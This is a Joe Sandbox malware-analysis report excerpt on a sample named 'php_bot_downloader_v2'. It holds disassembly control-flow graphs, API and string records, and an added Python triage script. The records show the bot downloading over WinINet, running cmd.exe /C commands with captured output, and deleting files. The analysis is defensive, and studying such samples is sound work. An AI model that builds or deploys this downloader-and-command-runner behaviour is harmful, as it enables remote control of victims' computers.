15720 7ff658e2d414 16 API calls 15719->15720 15721 
7ff658e26153 15720->15721 15722 7ff658e2d554 4 API calls 15721->15722 15722->15715 15724 7ff658e26591 15723->15724 15725 7ff658e265d0 15723->15725 15726 7ff658e2d5b4 5 API calls 15724->15726 15727 7ff658e2d840 _handle_error 8 API calls 15725->15727 15729 7ff658e2659d 15726->15729 15728 7ff658e265e4 15727->15728 15728->15041 15729->15725 15730 7ff658e2d414 16 API calls 15729->15730 15731 7ff658e265c3 15730->15731 15732 7ff658e2d554 4 API calls 15731->15732 15732->15725 15734 7ff658e267f1 15733->15734 15735 7ff658e26830 15733->15735 15736 7ff658e2d5b4 5 API calls 15734->15736 15737 7ff658e2d840 _handle_error 8 API calls 15735->15737 15739 7ff658e267fd 15736->15739 15738 7ff658e26844 15737->15738 15738->15045 15739->15735 15740 7ff658e2d414 16 API calls 15739->15740 15741 7ff658e26823 15740->15741 15742 7ff658e2d554 4 API calls 15741->15742 15742->15735 15744 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15743->15744 15745 7ff658e21df0 15744->15745 15746 7ff658e21e53 std::ios_base::failure::failure 15745->15746 16104 7ff658e23d90 15745->16104 15749 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15746->15749 15748 7ff658e21e1a 16108 7ff658e21950 15748->16108 15751 7ff658e21e7a 15749->15751 15753 7ff658e2d840 _handle_error 8 API calls 15751->15753 15756 7ff658e21e92 15753->15756 15756->15049 15757 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15758 7ff658e21e48 15757->15758 16123 7ff658e24ef0 15758->16123 15761 7ff658e266f7 15760->15761 15762 7ff658e266b8 15760->15762 15763 7ff658e2d840 _handle_error 8 API calls 15761->15763 15764 7ff658e2d5b4 5 API calls 15762->15764 15765 7ff658e2670b 15763->15765 15766 7ff658e266c4 15764->15766 15765->15054 15766->15761 15767 7ff658e2d414 16 API calls 15766->15767 15768 7ff658e266ea 15767->15768 15769 7ff658e2d554 4 API calls 15768->15769 15769->15761 15771 7ff658e261df 15770->15771 15772 7ff658e2621e 15770->15772 
15774 7ff658e2d5b4 5 API calls 15771->15774 15773 7ff658e2d840 _handle_error 8 API calls 15772->15773 15775 7ff658e26232 15773->15775 15776 7ff658e261eb 15774->15776 15775->15064 15776->15772 15777 7ff658e2d414 16 API calls 15776->15777 15778 7ff658e26211 15777->15778 15779 7ff658e2d554 4 API calls 15778->15779 15779->15772 15781 7ff658e225c8 std::ios_base::failure::failure _Func_class 15780->15781 15782 7ff658e28690 std::ios_base::failure::failure 15 API calls 15781->15782 15783 7ff658e225fd Concurrency::details::WorkQueue::IsStructuredEmpty 15781->15783 15782->15783 16165 7ff658e23b10 15783->16165 15785 7ff658e21327 15786 7ff658e22690 15785->15786 15787 7ff658e226b5 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure _Func_class type_info::_name_internal_method 15786->15787 15788 7ff658e226ef Concurrency::details::WorkQueue::IsStructuredEmpty 15787->15788 15789 7ff658e28690 std::ios_base::failure::failure 15 API calls 15787->15789 15790 7ff658e23b10 21 API calls 15788->15790 15789->15788 15791 7ff658e21343 15790->15791 15792 7ff658e224e0 15791->15792 16169 7ff658e28750 15792->16169 15794 7ff658e2250a Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15794->15081 15796 7ff658e28440 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15795->15796 15797 7ff658e24ed3 Concurrency::details::WorkQueue::IsStructuredEmpty 15796->15797 15797->15083 15799 7ff658e239b8 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15798->15799 16185 7ff658e27150 15799->16185 15801 7ff658e23a08 Concurrency::details::WorkQueue::IsStructuredEmpty 15801->15091 16189 7ff658e2ac70 15802->16189 15804 7ff658e21ec7 Concurrency::details::WorkQueue::IsStructuredEmpty 15805 7ff658e21ed1 PathFileExistsW 15804->15805 15806 7ff658e21ede 15805->15806 15807 7ff658e24ef0 17 API calls 15806->15807 15808 7ff658e21efd 15807->15808 15809 7ff658e24ec0 
Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15808->15809 15810 7ff658e21f08 15809->15810 15811 7ff658e2d840 _handle_error 8 API calls 15810->15811 15812 7ff658e213d0 15811->15812 15812->15094 15812->15095 15814 7ff658e25bef 15813->15814 15815 7ff658e25bb0 15813->15815 15816 7ff658e2d840 _handle_error 8 API calls 15814->15816 15817 7ff658e2d5b4 5 API calls 15815->15817 15818 7ff658e25c06 15816->15818 15819 7ff658e25bbc 15817->15819 15818->15101 15819->15814 15820 7ff658e2d414 16 API calls 15819->15820 15821 7ff658e25be2 15820->15821 15822 7ff658e2d554 4 API calls 15821->15822 15822->15814 16216 7ff658e2d7d0 15823->16216 15825 7ff658e22284 InternetOpenA 15826 7ff658e223b8 15825->15826 15827 7ff658e222ca InternetOpenUrlA 15825->15827 15828 7ff658e2d840 _handle_error 8 API calls 15826->15828 15829 7ff658e223ad InternetCloseHandle 15827->15829 15830 7ff658e22305 15827->15830 15831 7ff658e214ca 15828->15831 15829->15826 16218 7ff658e236b0 15830->16218 15831->15109 15833 7ff658e22397 InternetCloseHandle 16242 7ff658e268a0 15833->16242 15834 7ff658e22349 InternetReadFile 15836 7ff658e2232b 15834->15836 15837 7ff658e2238d 15834->15837 15836->15833 15836->15834 15836->15837 16228 7ff658e2b470 15836->16228 16237 7ff658e28ef0 15837->16237 16531 7ff658e26380 15840->16531 15842 7ff658e21f6f shared_ptr 15843 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15842->15843 15844 7ff658e21f87 15843->15844 15845 7ff658e22690 32 API calls 15844->15845 15846 7ff658e21fa4 15845->15846 15847 7ff658e224e0 32 API calls 15846->15847 15848 7ff658e21fcd 15847->15848 15849 7ff658e22540 32 API calls 15848->15849 15850 7ff658e21ff5 15849->15850 15851 7ff658e224e0 32 API calls 15850->15851 15852 7ff658e2201e 15851->15852 15853 7ff658e22540 32 API calls 15852->15853 15854 7ff658e22046 15853->15854 15855 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15854->15855 15856 7ff658e22054 15855->15856 
15857 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15856->15857 15858 7ff658e22062 15857->15858 15859 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15858->15859 15860 7ff658e22070 15859->15860 15861 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15860->15861 15862 7ff658e2207e 15861->15862 15863 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15862->15863 15864 7ff658e220ac 15863->15864 15865 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15864->15865 15866 7ff658e220d3 15865->15866 15867 7ff658e21ab0 38 API calls 15866->15867 15868 7ff658e220f5 15867->15868 15869 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15868->15869 15870 7ff658e2210e 15869->15870 15871 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15870->15871 15872 7ff658e2211c 15871->15872 15873 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15872->15873 15874 7ff658e2212a 15873->15874 15875 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15874->15875 15876 7ff658e22138 15875->15876 15877 7ff658e2d840 _handle_error 8 API calls 15876->15877 15878 7ff658e215fc 15877->15878 15879 7ff658e25db0 15878->15879 15880 7ff658e25e5d 15879->15880 15881 7ff658e25e1e 15879->15881 15883 7ff658e2d840 _handle_error 8 API calls 15880->15883 15882 7ff658e2d5b4 5 API calls 15881->15882 15885 7ff658e25e2a 15882->15885 15884 7ff658e25e71 15883->15884 15884->15140 15885->15880 15886 7ff658e2d414 16 API calls 15885->15886 15887 7ff658e25e50 15886->15887 15888 7ff658e2d554 4 API calls 15887->15888 15888->15880 16541 7ff658e28790 15889->16541 15891 7ff658e2256a Concurrency::details::WorkQueue::IsStructuredEmpty 
std::ios_base::failure::failure 15891->15162 15893 7ff658e25f41 15892->15893 15894 7ff658e25f02 15892->15894 15896 7ff658e2d840 _handle_error 8 API calls 15893->15896 15895 7ff658e2d5b4 5 API calls 15894->15895 15898 7ff658e25f0e 15895->15898 15897 7ff658e25f55 15896->15897 15897->15177 15898->15893 15899 7ff658e2d414 16 API calls 15898->15899 15900 7ff658e25f34 15899->15900 15901 7ff658e2d554 4 API calls 15900->15901 15901->15893 15903 7ff658e21aea 15902->15903 15904 7ff658e21c26 15903->15904 15905 7ff658e21afb type_info::_name_internal_method 15903->15905 15906 7ff658e22760 32 API calls 15904->15906 15908 7ff658e21b16 15905->15908 15909 7ff658e21b2c 15905->15909 15907 7ff658e21c42 15906->15907 15910 7ff658e25500 17 API calls 15907->15910 16545 7ff658e25560 15908->16545 15912 7ff658e25560 32 API calls 15909->15912 15913 7ff658e21c59 15910->15913 15914 7ff658e21b2a 15912->15914 15915 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15913->15915 16549 7ff658e22760 15914->16549 15948 7ff658e21c24 15915->15948 15918 7ff658e2ac70 34 API calls 15919 7ff658e21c7b Concurrency::details::WorkQueue::IsStructuredEmpty 15918->15919 15922 7ff658e21ccd ShellExecuteExW 15919->15922 15920 7ff658e22540 32 API calls 15921 7ff658e21b85 15920->15921 15923 7ff658e224e0 32 API calls 15921->15923 15924 7ff658e21d0f WaitForSingleObject 15922->15924 15925 7ff658e21d22 GetExitCodeProcess CloseHandle 15922->15925 15926 7ff658e21bae 15923->15926 15924->15925 15927 7ff658e24ef0 17 API calls 15925->15927 15928 7ff658e22540 32 API calls 15926->15928 15929 7ff658e21d58 15927->15929 15930 7ff658e21bd6 15928->15930 15931 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15929->15931 15932 7ff658e25500 17 API calls 15930->15932 15933 7ff658e21d66 15931->15933 15934 7ff658e21bed 15932->15934 15936 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 
15933->15936 15935 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15934->15935 15937 7ff658e21bfa 15935->15937 15938 7ff658e21d74 15936->15938 15939 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15937->15939 15940 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15938->15940 15941 7ff658e21c08 15939->15941 15942 7ff658e21d82 15940->15942 15943 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15941->15943 15944 7ff658e2d840 _handle_error 8 API calls 15942->15944 15945 7ff658e21c16 15943->15945 15946 7ff658e21818 15944->15946 15947 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15945->15947 15946->15206 15947->15948 15948->15918 15950 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15949->15950 15951 7ff658e2219a 15950->15951 15952 7ff658e21ea0 35 API calls 15951->15952 15953 7ff658e221a9 15952->15953 15954 7ff658e2ac70 34 API calls 15953->15954 15968 7ff658e22225 15953->15968 15956 7ff658e221c6 Concurrency::details::WorkQueue::IsStructuredEmpty 15954->15956 15955 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15969 7ff658e221fd 15955->15969 15957 7ff658e221d0 DeleteFileW 15956->15957 15959 7ff658e221dd 15957->15959 15960 7ff658e22205 15957->15960 15958 7ff658e2d840 _handle_error 8 API calls 15961 7ff658e21845 15958->15961 15962 7ff658e24ef0 17 API calls 15959->15962 15963 7ff658e24ef0 17 API calls 15960->15963 15961->15210 15964 7ff658e221ef 15962->15964 15965 7ff658e22217 15963->15965 15966 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15964->15966 15967 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15965->15967 15966->15969 
15967->15968 15968->15955 15968->15969 15969->15958 15973 7ff658e2d5ca 15970->15973 15971 7ff658e2d5cf LeaveCriticalSection 15973->15971 15975 7ff658e2d660 15973->15975 15976 7ff658e2d691 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 15975->15976 15977 7ff658e2d674 15975->15977 15977->15976 15979 7ff658e28958 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 15978->15979 15982 7ff658e28980 15979->15982 15981 7ff658e28972 15981->15692 15983 7ff658e28a01 15982->15983 15985 7ff658e289a4 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 15982->15985 15986 7ff658e22bf0 15983->15986 15985->15981 15987 7ff658e22c12 std::ios_base::failure::failure 15986->15987 15989 7ff658e22c1e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15987->15989 15994 7ff658e28690 15987->15994 15997 7ff658e286d0 15989->15997 15991 7ff658e22c64 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15993 7ff658e22cd8 std::ios_base::failure::failure 15991->15993 16001 7ff658e28ff0 15991->16001 15993->15985 16004 7ff658e2be14 15994->16004 15998 7ff658e286e8 allocator 15997->15998 16028 7ff658e22840 15998->16028 16074 7ff658e22970 16001->16074 16003 7ff658e29012 16003->15993 16009 7ff658e2bc6c 16004->16009 16008 7ff658e2be36 16017 7ff658e2e898 16009->16017 16011 7ff658e2bca0 16012 7ff658e2e950 16011->16012 16013 7ff658e2e98c RtlPcToFileHeader 16012->16013 16014 7ff658e2e96f 16012->16014 16015 7ff658e2e9b3 RaiseException 16013->16015 16016 7ff658e2e9a4 16013->16016 16014->16013 16015->16008 16016->16015 16018 7ff658e2e8ee __std_exception_copy 16017->16018 16019 7ff658e2e8b9 16017->16019 16018->16011 16019->16018 16021 7ff658e3b3b4 16019->16021 16022 7ff658e3b3cb 16021->16022 16023 7ff658e3b3c1 16021->16023 16024 7ff658e35e24 _set_errno_from_matherr 13 API calls 16022->16024 16023->16022 16026 7ff658e3b3e6 16023->16026 16025 7ff658e3b3d2 
_invalid_parameter_noinfo 16024->16025 16025->16018 16026->16025 16027 7ff658e35e24 _set_errno_from_matherr 13 API calls 16026->16027 16027->16025 16029 7ff658e22860 16028->16029 16030 7ff658e22854 16028->16030 16032 7ff658e2285e 16029->16032 16042 7ff658e26f00 16029->16042 16034 7ff658e22880 16030->16034 16032->15991 16035 7ff658e228a8 16034->16035 16036 7ff658e228a3 16034->16036 16038 7ff658e26f00 _Allocate 4 API calls 16035->16038 16045 7ff658e28340 16036->16045 16040 7ff658e228b2 16038->16040 16041 7ff658e228d2 16040->16041 16049 7ff658e3361c 16040->16049 16041->16032 16057 7ff658e2d190 16042->16057 16046 7ff658e2834e stdext::threads::lock_error::lock_error 16045->16046 16047 7ff658e2e950 std::_Xinvalid_argument 2 API calls 16046->16047 16048 7ff658e2835f 16047->16048 16048->16035 16050 7ff658e33635 16049->16050 16053 7ff658e3364c IsProcessorFeaturePresent 16050->16053 16054 7ff658e3365f 16053->16054 16055 7ff658e333e8 _invalid_parameter_noinfo_noreturn 14 API calls 16054->16055 16056 7ff658e3367a GetCurrentProcess TerminateProcess 16055->16056 16058 7ff658e2d19b 16057->16058 16059 7ff658e26f13 16058->16059 16060 7ff658e38724 std::_Facet_Register 2 API calls 16058->16060 16061 7ff658e2d1ba 16058->16061 16059->16032 16060->16058 16062 7ff658e2d1c5 16061->16062 16066 7ff658e2db00 16061->16066 16070 7ff658e2db20 16062->16070 16067 7ff658e2db0e std::bad_alloc::bad_alloc 16066->16067 16068 7ff658e2e950 std::_Xinvalid_argument RtlPcToFileHeader RaiseException 16067->16068 16069 7ff658e2db1f 16068->16069 16071 7ff658e2db2e stdext::threads::lock_error::lock_error 16070->16071 16072 7ff658e2e950 std::_Xinvalid_argument RtlPcToFileHeader RaiseException 16071->16072 16073 7ff658e2db3f 16072->16073 16075 7ff658e22989 16074->16075 16077 7ff658e22998 16074->16077 16078 7ff658e26e60 16075->16078 16077->16003 16079 7ff658e26ec4 16078->16079 16080 7ff658e3361c _invalid_parameter_noinfo_noreturn 17 API calls 16079->16080 16081 7ff658e26ee7 16079->16081 16080->16079 16081->16077 
16089 7ff658e2d3d8 16082->16089 16084 7ff658e25d83 16085 7ff658e2d554 EnterCriticalSection LeaveCriticalSection 16084->16085 16086 7ff658e2d61c 16085->16086 16087 7ff658e2d62c 16086->16087 16088 7ff658e2d63e SetEvent ResetEvent 16086->16088 16090 7ff658e2d3f2 16089->16090 16092 7ff658e2d3eb 16089->16092 16093 7ff658e39584 16090->16093 16092->16084 16096 7ff658e391d0 16093->16096 16103 7ff658e34f54 EnterCriticalSection 16096->16103 16105 7ff658e23db0 std::ios_base::failure::failure 16104->16105 16126 7ff658e28a40 16105->16126 16107 7ff658e23deb Concurrency::details::WorkQueue::IsStructuredEmpty 16107->15748 16109 7ff658e21988 Concurrency::details::WorkQueue::IsStructuredEmpty _Func_class 16108->16109 16110 7ff658e2199b WideCharToMultiByte 16109->16110 16111 7ff658e219e4 Concurrency::details::WorkQueue::IsStructuredEmpty 16110->16111 16112 7ff658e21a00 WideCharToMultiByte 16111->16112 16113 7ff658e23a20 std::ios_base::failure::failure 32 API calls 16112->16113 16114 7ff658e21a48 std::ios_base::failure::failure 16113->16114 16115 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 16114->16115 16116 7ff658e21a83 16115->16116 16117 7ff658e2d840 _handle_error 8 API calls 16116->16117 16118 7ff658e21a9b 16117->16118 16119 7ff658e25500 16118->16119 16120 7ff658e25519 Concurrency::details::WorkQueue::IsStructuredEmpty 16119->16120 16121 7ff658e21e3e 16120->16121 16154 7ff658e27f70 16120->16154 16121->15757 16161 7ff658e28500 16123->16161 16125 7ff658e24f03 Concurrency::details::WorkQueue::IsStructuredEmpty 16125->15746 16127 7ff658e28a58 Concurrency::details::WorkQueue::IsStructuredEmpty 16126->16127 16130 7ff658e28a80 16127->16130 16129 7ff658e28a72 16129->16107 16131 7ff658e28b01 16130->16131 16133 7ff658e28aa4 Concurrency::details::WorkQueue::IsStructuredEmpty char_traits 16130->16133 16134 7ff658e22ad0 16131->16134 16133->16129 16135 7ff658e22af2 16134->16135 16136 7ff658e28690 std::ios_base::failure::failure 15 API 
calls 16135->16136 16137 7ff658e22afe Concurrency::details::WorkQueue::IsStructuredEmpty 16135->16137 16136->16137 16142 7ff658e28700 16137->16142 16139 7ff658e22b44 Concurrency::details::WorkQueue::IsStructuredEmpty 16141 7ff658e22bb8 std::ios_base::failure::failure 16139->16141 16147 7ff658e29020 16139->16147 16141->16133 16150 7ff658e22a60 16142->16150 16145 7ff658e22840 _Allocate 21 API calls 16146 7ff658e28720 16145->16146 16146->16139 16148 7ff658e22970 allocator 17 API calls 16147->16148 16149 7ff658e29048 16148->16149 16149->16141 16151 7ff658e22a8e 16150->16151 16152 7ff658e22a93 16150->16152 16153 7ff658e28340 Concurrency::cancel_current_task 2 API calls 16151->16153 16152->16145 16153->16152 16157 7ff658e28440 16154->16157 16156 7ff658e27f8e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure Concurrency::details::FreeThreadProxyFactory::Retire 16156->16121 16159 7ff658e28456 Concurrency::details::WorkQueue::IsStructuredEmpty 16157->16159 16158 7ff658e284b1 char_traits 16158->16156 16159->16158 16160 7ff658e28ff0 allocator 17 API calls 16159->16160 16160->16158 16163 7ff658e28516 Concurrency::details::WorkQueue::IsStructuredEmpty 16161->16163 16162 7ff658e28571 char_traits 16162->16125 16163->16162 16164 7ff658e29020 allocator 17 API calls 16163->16164 16164->16162 16166 7ff658e23b34 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 16165->16166 16167 7ff658e23bfe Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 16166->16167 16168 7ff658e286d0 allocator 21 API calls 16166->16168 16167->15785 16168->16167 16170 7ff658e2876b Concurrency::details::WorkQueue::IsStructuredEmpty 16169->16170 16173 7ff658e287d0 16170->16173 16172 7ff658e28781 16172->15794 16174 7ff658e2888f 16173->16174 16176 7ff658e2880e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 16173->16176 16177 7ff658e22fe0 16174->16177 
control_flow_graph (continuation; the node adjacency list of the rendered graph is elided, as the drawing is not recoverable from text). Node addresses span 7ff658e21b5d-7ff658e4a34a. Windows APIs reached on this graph: MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, EncodePointer, RtlPcToFileHeader, RaiseException. Every other node carries an MSVC STL/CRT label from the IDA plugin (std::ios_base::failure::failure, allocator, std::_Lockit, std::locale::_Getfacet, std::_Locinfo, std::_Facet_Register, std::bad_alloc, Concurrency::details::WorkQueue::IsStructuredEmpty, Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy, Concurrency::cancel_current_task, _invalid_parameter_noinfo, _set_errno_from_matherr, _fread_nolock, _handle_error, _Fputc, BuildCatchObjectHelperInternal, __scrt_fastfail).

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandleOpenProcessorVirtual$Concurrency::FileReadRootRoot::
                                                • String ID: Downloader
                                                • API String ID: 468320751-2223799613
                                                • Opcode ID: bf0e7b194c67c6f95d9e5dac6448b552355a720301ad6c01c86269b4cab85926
                                                • Instruction ID: fbb108deb139b4c0794a8be0a6be355a06729750435ee60801dff03251e27b7c
                                                • Opcode Fuzzy Hash: bf0e7b194c67c6f95d9e5dac6448b552355a720301ad6c01c86269b4cab85926
                                                • Instruction Fuzzy Hash: 87313E31618A9682E7609B20F8557AFA770FBC4784F441035EA8E97EA4DF7DD444CB08

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source: same dump as the first record above (0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, offset 00007FF658E20000, based on PE); snapshot file hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd.
                                                Similarity
                                                • API ID: CloseCodeConcurrency::details::EmptyExecuteExitHandleObjectProcessQueue::ShellSingleStructuredWaitWorktype_info::_name_internal_method
                                                • String ID: 2>&1$ > $/C $/C $@$cmd.exe$p
                                                • API String ID: 677652370-1402895998
                                                • Opcode ID: ecd0709a960a5d5daa54d7dab036d8559c6efa0a97d991f069f00276a01038b8
                                                • Instruction ID: 3def470a8272c08678ea9f1dd8031ae67251f18ebbdf1c42a9e6581ec05cb3f3
                                                • Opcode Fuzzy Hash: ecd0709a960a5d5daa54d7dab036d8559c6efa0a97d991f069f00276a01038b8
                                                • Instruction Fuzzy Hash: 7B71083260CAD691E621DB24E8503EFA3B1FBC4784F444132D68E97AA9DF7CE544CB44
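The two "Similarity" records above (the "Downloader" function with WinINet-style imports, and the function whose literal strings are cmd.exe, /C, " > " and 2>&1) are the most informative part of this dump. The following triage script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses those two records as they appear on the page and tags each function by what its API tokens and strings suggest. Two assumptions are built in and labelled in the code: the "API ID" value is treated as a digest of word tokens taken from the called API names (so "Shell" together with "Execute" is read as a ShellExecute-style launch), and the tag keywords are this script's own heuristics, not a Joe Sandbox classification.

```python
"""Triage helper for Joe Sandbox "Similarity" records of a dumped module.

Added example; not part of the Joe Sandbox report or of the analysed sample.
It parses the "API ID", "String ID" and "Instruction ID" bullet lines of the
two function records quoted in the report (copied verbatim into
REPORT_RECORDS) and tags each function by what its imports and literal
strings suggest.

Assumptions: the "API ID" value is treated as a digest of word tokens from
the called API names, and the tag keywords below are this script's own
heuristics; neither is a Joe Sandbox classification.
"""
import re
from dataclasses import dataclass, field

# Copied from the report's two "Similarity" blocks.
REPORT_RECORDS = """
• API ID: Internet$CloseHandleOpenProcessorVirtual$Concurrency::FileReadRootRoot::
• String ID: Downloader
• API String ID: 468320751-2223799613
• Instruction ID: fbb108deb139b4c0794a8be0a6be355a06729750435ee60801dff03251e27b7c

• API ID: CloseCodeConcurrency::details::EmptyExecuteExitHandleObjectProcessQueue::ShellSingleStructuredWaitWorktype_info::_name_internal_method
• String ID: 2>&1$ > $/C $/C $@$cmd.exe$p
• API String ID: 677652370-1402895998
• Instruction ID: 3def470a8272c08678ea9f1dd8031ae67251f18ebbdf1c42a9e6581ec05cb3f3
"""

FIELD_RE = re.compile(
    r"^(?:•\s*)?(API ID|String ID|API String ID|Instruction ID):\s*(.*)$"
)


@dataclass
class FunctionRecord:
    instruction_id: str = ""
    api_tokens: str = ""                          # raw "API ID" value
    strings: list = field(default_factory=list)   # "String ID" split on "$"
    tags: set = field(default_factory=set)


def parse_records(text: str) -> list:
    """One FunctionRecord per blank-line-separated block of bullet lines."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = FunctionRecord()
        for line in block.splitlines():
            m = FIELD_RE.match(line.strip())
            if not m:
                continue
            key, value = m.groups()
            if key == "Instruction ID":
                rec.instruction_id = value
            elif key == "API ID":
                rec.api_tokens = value
            elif key == "String ID":
                # Joe Sandbox joins the function's literal strings with "$";
                # surrounding spaces are kept, they show how the line is built.
                rec.strings = value.split("$") if value else []
        records.append(rec)
    return records


def classify(rec: FunctionRecord) -> set:
    """Heuristic tags (assumption: API ID is a word-token digest of API names)."""
    api = rec.api_tokens
    stripped = [s.strip() for s in rec.strings]
    tags = set()
    if "Internet" in api:                        # WinINet Internet* calls
        tags.add("wininet-download")
    if "Shell" in api and "Execute" in api:      # ShellExecute-style launch
        tags.add("shellexecute")
    if "Wait" in api and "Single" in api:        # WaitForSingleObject on child
        tags.add("waits-for-child")
    # "cmd.exe", "/C", " > " and "2>&1" together describe a command line of
    # the form: cmd.exe /C <command> > <file> 2>&1  (stdout+stderr captured)
    if "cmd.exe" in stripped and "/C" in stripped:
        tags.add("cmd-exec")
        if ">" in stripped and any("2>&1" in s for s in stripped):
            tags.add("output-captured")
    rec.tags = tags
    return tags


def triage(text: str) -> dict:
    """Map each Instruction ID to its tag set."""
    return {rec.instruction_id: classify(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for iid, tags in triage(REPORT_RECORDS).items():
        print(iid[:16], sorted(tags))
```

Read together, the tags give the analyst's one-line summary of these two functions: one fetches content over WinINet, the other launches cmd.exe /C with a command whose stdout and stderr are redirected to a file and waits for it to finish. The runtime values of the command and the output path are not in the report, so the script deliberately does not try to reconstruct them.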

                                                Control-flow Graph

                                                control_flow_graph 7ff658e210b0-7ff658e2192a (node list and executed/not-executed colouring elided; the rendered graph is not recoverable from text). The entry block calls, in sequence, the helper routines 7ff658e26240, 7ff658e25750, 7ff658e23a20, 7ff658e25c70, 7ff658e25860, 7ff658e26040, 7ff658e264b0, 7ff658e26710, 7ff658e21db0 and 7ff658e224b0; later blocks chain further helpers (7ff658e265f0, 7ff658e26180, 7ff658e225a0, 7ff658e22690, 7ff658e224e0, 7ff658e239a0, 7ff658e21ea0, 7ff658e25a10, 7ff658e28c40, 7ff658e22270, 7ff658e21f30, 7ff658e25db0, 7ff658e22540, 7ff658e25e80, 7ff658e21ab0, 7ff658e22160). Four blocks call 7ff658e24ec0 7, 12, 12 and 17 times respectively, and every path converges on 7ff658e2192e-7ff658e21946 (call 7ff658e2d840). No Windows API is called directly from this graph.
                                                APIs
                                                Memory Dump Source: same dump as the first record above (0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, offset 00007FF658E20000, based on PE); snapshot file hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd.
                                                Similarity
                                                • API ID: shared_ptr$Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method
                                                • String ID:
                                                • API String ID: 3540271106-0
                                                • Opcode ID: 660f85d507ffcc3d8142a87e9c076f7a78da7657eb6308c16db16e608eb55c71
                                                • Instruction ID: 860c26d71111dc3ef18603b0bb613b2841b51e82eedb19f3ffcc62fec878760c
